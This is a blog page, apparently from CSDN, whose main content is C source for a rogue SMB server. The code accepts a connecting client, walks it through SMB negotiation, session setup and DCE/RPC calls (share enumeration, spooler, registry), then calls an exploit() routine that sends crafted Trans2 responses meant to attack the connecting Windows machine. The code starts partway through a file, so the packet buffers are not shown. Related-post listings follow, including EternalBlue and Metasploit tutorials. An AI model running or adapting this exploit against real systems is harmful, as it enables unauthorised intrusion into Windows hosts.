 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "TreeConnectAndX/n" );
 TreeConnectAndX[30] = response[30];
 TreeConnectAndX[31] = response[31];
 TreeConnectAndX[34] = response[34];
 TreeConnectAndX[35] = response[35];
 
 strncpy ( TreeConnectAndX + 28, ( char* ) &treeid, 2 );
 strncpy ( TreeConnectAndX + 32, ( char* ) &userid, 2 );
 
 send ( s, TreeConnectAndX, sizeof ( TreeConnectAndX ) -1, 0 );
}

void
digg ( int s, unsigned long fid, unsigned long assocgroup, unsigned
   long userid, unsigned long treeid, int option )
{
 int ret;
 char response[1024];
 unsigned char srv[] = "/x73/x72/x76";
 unsigned char wks[] = "/x77/x6b/x73";
 
 memset ( &response,0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "SmbNtCreate/n" );
 SmbNtCreate[30] = response[30];
 SmbNtCreate[31] = response[31];
 SmbNtCreate[34] = response[34];
 SmbNtCreate[35] = response[35];
 
 strncpy ( SmbNtCreate + 28, ( char* ) &treeid, 2 );
 strncpy ( SmbNtCreate + 32, ( char* ) &userid, 2 );
 strncpy ( SmbNtCreate + 42, ( char* ) &fid, 2 );
 
 send ( s, SmbNtCreate, sizeof ( SmbNtCreate ) -1, 0 );
 
 memset ( &response,0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "DceRpc/n" );
 DceRpc[30] = response[30];
 DceRpc[31] = response[31];
 DceRpc[34] = response[34];
 DceRpc[35] = response[35];
 
 strncpy ( DceRpc + 28, ( char* ) &treeid, 2 );
 strncpy ( DceRpc + 32, ( char* ) &userid, 2 );
 strncpy ( DceRpc + 80, ( char* ) &assocgroup, 2 );
 
 ret = check_interface ( (unsigned char *)response );
 if ( ret == 0 )
  memcpy ( DceRpc + 92, wks, 3 );
 else if ( ret == 1 )
  memcpy ( DceRpc + 92, srv, 3 );
 else if ( ret == 2 );
 else if ( ret == 3 );
 else
 {
  printf ( "invalid interface uuid, aborting.../n" );
  printf("%x/n",(unsigned char*)response[8]);
  exit ( 1 );
 }
 
 send ( s, DceRpc, sizeof ( DceRpc ) -1, 0 );
 
 memset ( &response, 0,sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 printf("DEBUG:optione=%d  ret=%d/n",option,ret);
 if ( option == 1 )
 {
  printf ( "NetrShareEnum/n" );
  NetrShareEnum[30] = response[30];
  NetrShareEnum[31] = response[31];
  NetrShareEnum[34] = response[34];
  NetrShareEnum[35] = response[35];
  
  strncpy ( NetrShareEnum + 28, ( char* ) &treeid, 2 );
  strncpy ( NetrShareEnum + 32, ( char* ) &userid, 2 );
  
  send ( s, NetrShareEnum, sizeof ( NetrShareEnum ) -1, 0 );
 }
 else if ( ( option == 2 ) && ( ret == 2 ) )
 {
  printf ( "OpenPrinterEx/n" );
  OpenPrinterEx[30] = response[30];
  OpenPrinterEx[31] = response[31];
  OpenPrinterEx[34] = response[34];
  OpenPrinterEx[35] = response[35];
  
  strncpy ( OpenPrinterEx + 28, ( char* ) &treeid, 2 );
  strncpy ( OpenPrinterEx + 32, ( char* ) &userid, 2 );
  
  send ( s, OpenPrinterEx, sizeof ( OpenPrinterEx ) -1, 0 );
  
  memset ( &response, 0,sizeof ( response ) );
  recv ( s, response, sizeof ( response ) -1, 0 );
  
  printf ( "ClosePrinter/n" );
  m_ClosePrinter[30] = response[30];
  m_ClosePrinter[31] = response[31];
  m_ClosePrinter[34] = response[34];
  m_ClosePrinter[35] = response[35];
  
  strncpy ( m_ClosePrinter + 28, ( char* ) &treeid, 2 );
  strncpy ( m_ClosePrinter + 32, ( char* ) &userid, 2 );
  
  send ( s, m_ClosePrinter, sizeof ( m_ClosePrinter ) -1, 0 );
 }
 else if ( ( option == 3 ) && ( ret == 3 ) )
 {
  printf ( "OpenHklm/n" );
  OpenHklm[30] = response[30];
  OpenHklm[31] = response[31];
  OpenHklm[34] = response[34];
  OpenHklm[35] = response[35];
  
  strncpy ( OpenHklm + 28, ( char* ) &treeid, 2 );
  strncpy ( OpenHklm + 32, ( char* ) &userid, 2 );
  
  send ( s, OpenHklm, sizeof ( OpenHklm ) -1, 0 );
  
  memset ( &response, 0, sizeof ( response ) );
  recv ( s, response, sizeof ( response ) -1, 0 );
  
  printf ( "OpenKey/n" );
  OpenKey[30] = response[30];
  OpenKey[31] = response[31];
  OpenKey[34] = response[34];
  OpenKey[35] = response[35];
  
  strncpy ( OpenKey + 28, ( char* ) &treeid, 2 );
  strncpy ( OpenKey + 32, ( char* ) &userid, 2 );
  
  send ( s, OpenKey, sizeof ( OpenKey ) -1, 0 );
  
  memset ( &response, 0,sizeof ( response ) );
  recv ( s, response, sizeof ( response ) -1, 0 );
  
  printf ( "CloseKey/n" );
  CloseKey[30] = response[30];
  CloseKey[31] = response[31];
  CloseKey[34] = response[34];
  CloseKey[35] = response[35];
  
  strncpy ( CloseKey + 28, ( char* ) &treeid, 2 );
  strncpy ( CloseKey + 32, ( char* ) &userid, 2 );
  
  send ( s, CloseKey, sizeof ( CloseKey ) -1, 0 );
 }
 else if ( option == 4 )
 {
  printf ( "NetBios1/n" );
  NetBios1[30] = response[30];
  NetBios1[31] = response[31];
  NetBios1[34] = response[34];
  NetBios1[35] = response[35];
  
  strncpy ( NetBios1 + 28, ( char* ) &treeid, 2 );
  strncpy ( NetBios1 + 32, ( char* ) &userid, 2 );
  
  send ( s, NetBios1, sizeof ( NetBios1 ) -1, 0 );
 }
 else
 {
  if ( ret == 0 )
  {
   printf ( "WksSvc/n" );
   WksSvc[30] = response[30];
   WksSvc[31] = response[31];
   WksSvc[34] = response[34];
   WksSvc[35] = response[35];
   
   strncpy ( WksSvc + 28, ( char* ) &treeid, 2 );
   strncpy ( WksSvc + 32, ( char* ) &userid, 2 );
   
   send ( s, WksSvc, sizeof ( WksSvc ) -1, 0 );
  }
  else
  {
   printf ( "SrvSvc/n" );
   SrvSvc[30] = response[30];
   SrvSvc[31] = response[31];
   SrvSvc[34] = response[34];
   SrvSvc[35] = response[35];
   
   strncpy ( SrvSvc + 28, ( char* ) &treeid, 2 );
   strncpy ( SrvSvc + 32, ( char* ) &userid, 2 );
   
   send ( s, SrvSvc, sizeof ( SrvSvc ) -1, 0 );
  }
 }
 
 memset ( &response, 0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "SmbClose/n" );
 SmbClose[30] = response[30];
 SmbClose[31] = response[31];
 SmbClose[34] = response[34];
 SmbClose[35] = response[35];
 
 strncpy ( SmbClose + 28, ( char* ) &treeid, 2 );
 strncpy ( SmbClose + 32, ( char* ) &userid, 2 );
 
 send ( s, SmbClose, sizeof ( SmbClose ) -1, 0 );
}

void
exploit ( int s, unsigned long fid, unsigned long assocgroup, unsigned long userid, unsigned long treeid )
{
 char response[1024];
 
 memset ( &response,0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "NetBios2/n" );
 NetBios2[30] = response[30];
 NetBios2[31] = response[31];
 NetBios2[34] = response[34];
 NetBios2[35] = response[35];
 
 strncpy ( NetBios2 + 28, ( char* ) &treeid, 2 );
 strncpy ( NetBios2 + 32, ( char* ) &userid, 2 );
 
 send ( s, (  char* )NetBios2, sizeof ( NetBios2 ) -1, 0 );
 
 memset ( &response, 0,sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "Trans2Response1/n" );
 Trans2Response1[30] = response[30];
 Trans2Response1[31] = response[31];
 Trans2Response1[34] = response[34];
 Trans2Response1[35] = response[35];
 
 strncpy ( Trans2Response1 + 28, ( char* ) &treeid, 2 );
 strncpy ( Trans2Response1 + 32, ( char* ) &userid, 2 );
 
 send ( s, (  char* )Trans2Response1, sizeof ( Trans2Response1 ) -1, 0 );
 
 memset ( &response, 0, sizeof ( response ) );
 recv ( s, response, sizeof ( response ) -1, 0 );
 
 printf ( "Trans2Response2/n" );
 Trans2Response2[30] = response[30];
 Trans2Response2[31] = response[31];
 Trans2Response2[34] = response[34];
 Trans2Response2[35] = response[35];
 
 strncpy ( (  char* )Trans2Response2 + 28, (  char* ) &treeid, 2 );
 strncpy ( (  char* )Trans2Response2 + 32, (  char* ) &userid, 2 );
 
 send ( s, (  char* )Trans2Response2, sizeof ( Trans2Response2 ) -1, 0 );
 
 memset ( &response, 0,sizeof ( response ) );
 recv ( s,(  char* ) response, sizeof ( response ) -1, 0 );
 
 printf ( "Trans2Response3/n" );
 Trans2Response3[30] = response[30];
 Trans2Response3[31] = response[31];
 Trans2Response3[34] = response[34];
 Trans2Response3[35] = response[35];
 
 strncpy ( (char *)Trans2Response3 + 28, ( char* ) &treeid, 2 );
 strncpy ( (char *)Trans2Response3 + 32, ( char* ) &userid, 2 );
 
 send ( s, (char *)Trans2Response3, sizeof ( Trans2Response3 ) -1, 0 );
}

int
main ( int argc, char* argv[] )
{
 int s1, s2, i;
 unsigned long fid = 0x4000;
 unsigned long treeid = 0x0008;
 unsigned long userid = 0x0008;
 unsigned long assocgroup = 0x4756;
 int  clilen;
 struct sockaddr_in cliaddr, servaddr;
 
 memset ( &servaddr,0, sizeof ( servaddr ) );
 servaddr.sin_family = AF_INET;
 servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
 servaddr.sin_port = htons ( PORT );
 WSADATA wsa;
 WSAStartup(MAKEWORD(2,0),&wsa);
 s1 = socket ( AF_INET, SOCK_STREAM, 0 );
 bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
 listen ( s1, 1 );
 
// while(1)
 {
//  Sleep(100);
  clilen = sizeof ( cliaddr );
  memset(( struct sockaddr * ) &cliaddr,0,clilen);
  
  s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen );
  
  closesocket ( s1 );
  
  printf ( "/n%s/n/n", inet_ntoa ( cliaddr.sin_addr ) );

/*  if(strstr(inet_ntoa ( cliaddr.sin_addr ),"192.168")==NULL) {
   closesocket(s2);
   continue;
  }
*/  
  neg ( s2 ); // Negotiate
  sessionsetup ( s2, userid, treeid, 0 ); // SessionSetup
//  for ( i = 0; i < 15; i++ )
  for ( i = 0; i < 3; i++ )
  {
   digg ( s2, fid, assocgroup, userid, treeid, 0 );
   fid++;
   assocgroup ++;
  }
  digg ( s2, fid, assocgroup, userid, treeid, 1 ); // NetrShareEnum
  fid++;
  assocgroup ++;
  digg ( s2, fid, assocgroup, userid, treeid, 2 ); // spoolss
  fid++;
  assocgroup ++;
  for ( i = 0; i < 4; i++ )
  {
   digg ( s2, fid, assocgroup, userid, treeid, 0 );
   fid++;
   assocgroup ++;
  }
  digg ( s2, fid, assocgroup, userid, treeid, 3 ); // WinReg
  userid++;
  treeid++;
  sessionsetup ( s2, userid, treeid, 1 ); // SessionSetup
  userid--;
  treeid--;
  for ( i = 0; i < 2; i++ )
  {
   digg ( s2, fid, assocgroup, userid, treeid, 4 ); // NetBios
   fid++;
   assocgroup ++;
  }
  treeid += 2;
  exploit ( s2, fid, assocgroup, userid, treeid );
  
  printf ( "done!/n" );
  
  closesocket ( s2 );
 }
 return 0;
}

funlove76
关注
WindowsLinux卸载anaconda的完整解决方案
weixin_43178406的博客
08-26 5万+
本文主要介绍了卸载anaconda的解决方案,希望能对学习python的同学们有所帮助。需要说明的是,本文解决问题的方案是通用的,对于WindowsLinux操作系统来说,都是同样适用的。
出现 Transaction rolled back because it has been marked as rollback-only 解决方法
码农研究僧的博客
05-28 3890
出现 Transaction rolled back because it has been marked as rollback-only 解决方法
SMB协议详解
热门推荐
IT技术分享
11-23 8万+
一、概述     SMB(ServerMessage Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。SMB使用了NetBIOS的应用程序接口 (Ap...
域渗透记录
weixin_43058307的博客
09-15 296
环境搭建 环境说明 DC: •IP:10.10.10.10•OS:Windows 2012 WEB: •IP1:10.10.10.80•IP2:192.168.111.80•OS:Windows 2008•网站搭建:Weblogic 10.3.6 MSSQL 2008 注意登录de1ay域,登录名为de1ay.com\administrator 密码为1qaz@WSX PC: •IP1:10.10.10.201•IP2:192.168.111.201•OS:Windows 7 攻击机: •IP:192.1
BlackSquid恶意软件分析:利用8个臭名昭著的漏洞攻击服务器,并投放挖矿恶意软件
systemino的博客
06-06 1101
概述 如果说,攻击者成功利用未修复的安全漏洞实现攻击的事件,大家已经习以为常。那么,如果有攻击者使用了8个漏洞来获取企业资产数据及客户信息,那么事情就变得不一样了。 近期,我们发现了一个新型恶意软件系列,它使用多种Web服务器攻击和暴力攻击方式,针对Web服务器、网络驱动器和可移动驱动器发起攻击。我们根据该恶意软件所创建的注册表名称和主要组件文件名称,将其命名为BlackSquid。根据多个方...
驱动下的异常处理
crkres9527
09-27 596
返回状态值   检查内存的可用性   异常处理try-except   异常处理try-finally   断言 NTSTATUS typedef LONG NTSTATUS;   NT_SUCCESS #define NT_SUCCESS(Status) ((NTSTATUS)(Status) &gt;= 0)   #define STATUS_SUCCESS      ...
搜索共享目录 NetShareEnum
12-22
搜索计算机内部共享情况,删除,添加,修改一些共享属性,06年4月份写的,最近经常上csdn,所以上传资源玩玩,感受一下csdn的生活。在winxp下vc.net2003做的。
Transaction Processing Concepts and Techniques
07-29
事务处理:概念与技术 英文版pdf,本书列举了大量成功的商业和研究系统的实例,此外,列出了许多事务处理算法的可编译的C代码片段。本书对于那些对实现分布式系统或客户-服务器结构感兴趣的人来说,是值得一读的。...
一次HDFS JournalNode transaction lag问题分析排查
走在前往架构师的路上
01-17 5669
文章目录前言背景问题追踪排查分析排查一:JN服务本身问题排查二:NN 服务问题排查三:JN机器硬件层面问题推论四:JN受所在机器其它服务的影响总结 前言 众所周知,在HDFS集群中,NameNode服务是其中的核心服务。NameNode的性能处理效率的高低直接影响着其对外提供的服务能力。鉴于过往笔者已经写过诸多NameNode优化系列的文章,本文笔者来聊聊另外与NameNode相关的服务JournalNode(简称JN)服务。JournalNode是在HDFS HA模式下用来做共享editlog的存储的。
LoadRunner的两个不一致(Controller和Analysis;Summary Peport和Graphs-Average Transaction Response
航海日志
02-26 7093
LoadRunner的两个不一致及原因分析和解决办法(Controller和Analysis;Summary Peport和Graphs-Average Transaction Response
渗透测试工具小抄
记录,总结,成长
09-19 1万+
介绍 渗透测试工具作弊表,典型穿透测试工作的快速参考高级概述。设计为快速参考作弊表,提供执行渗透测试时将运行的典型命令的高级概述。对于更深入的信息,我会从右侧的菜单中推荐该工具的man文件或更具体的笔测试作弊表。 该作弊表的重点是基础架构/网络渗透测试,除了最后的几个sqlmap命令和一些Web服务器枚举之外,Web应用程序渗透测试不在此处。 更新日志 17/02/2017
Metasploit利用MS17-010漏洞
江左盟的博客
05-25 2万+
端口扫描 使用nmap扫描主机及开放的端口:nmap -sS 192.168.1.* Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-25 15:06 CST Nmap scan report for cvr328w (192.168.1.1) Host is up (0.00049s latency). Not shown: 998 cl...
metasploit-学习9--显示payload的模块的所有payload信息
简单就是美
06-19 4604
Name                                             Disclosure Date  Rank    Description    ----                                             ---------------  ----    ----------- aix/ppc/shell_bind_
方式程0day MS17-010远程溢出漏洞测试
十年磨一剑,霜刃未曾试!
06-02 1万+
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。 据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。 一、环境: 靶机:win7 IP:192.168.4.247 攻击机:win2003 IP:192.168.4.16 反弹shell: kali IP:192.168.4.15 在攻击机中需要p...
ms17-010 永恒之蓝漏洞利用+抓包分析过程
qq_41976183的博客
07-31 6477
一、实验环境: 1、攻击机:Kali 1)攻击工具:msf 2)分析工具:wireshark 3)IP地址:192.168.204.157(自动获得) 2、靶 机:Windows7 1)版本:SP1 2)开启网络共享(SMB协议) 3)关闭防火墙 4)IP地址:192.168.204.150(自动获得) 3、网卡连接方式:Vmnet8(NAT) 二、实验步骤: ...
Metasploit 利用 MS17-010漏洞(永恒之蓝)
test
11-20 1万+
环境 攻击机器:ubuntu 18.04 被攻击机器:windows xp sp2 可能使用的工具 metasploit nessus nmap等 正文 首先搭建所需要的靶机环境和安装所有可能使用到的工具,接着使用类似nessus等工具扫描目标网段。以下是扫描结果,靶机的IP是192.168.1.166 发现这个没有打补丁的靶机存在很多的漏洞,本篇博文利用的是MS17-10(永恒之蓝) ...
CTF SMB信息泄漏
Kstheme的博客
08-18 2828
工具 靶机 kali linux 操作步骤 SMB介绍 SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Inter)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为Samba。 SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445 SMB协议,计算机可以访问网络资源,下载对...
在BT5里Metasploit内网***(exploit/windows/smb/psexec)
weixin_33943836的博客
07-22 670
使用 BT5 破解***内部网络目标IP地址192.168.111.135 (windows server 2003 sp2)bt5 的IP地址192.168.111.134***条件:知道目标机器的ip  用户名  密码因为非法测试是不允许的,所以我在虚拟机里面实验首先,我们来查看bt5和win2k3的ip地址进入msfconsole进行***实验实验使用的漏洞是exploit/windows/...
使用 NetShareEnum 遍历本地共享目录需要注意的问题
Fire_Lord的专栏
01-14 3954
1 简介 Windows提供了NetShareEnum函数用于实现遍历服务器的共享目录,但在实现该功能时发现一个有关UNICODE和ANSI字符串的问题。 2. 函数原型简介 该函数原型如下: NET_API_STATUS NetShareEnum( LPWSTR servername, DWORD level, LPBYTE* bufptr, DWORD
clientTransaction
最新发布
07-09
"clientTransaction"通常是指客户端事务,它是在分布式系统或微服务架构中的一种概念,由客户端发起并管理的一系列操作。这些操作通常与服务器交互,期望作为一个单独的操作单元执行,即如果其中任何一个操作失败,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值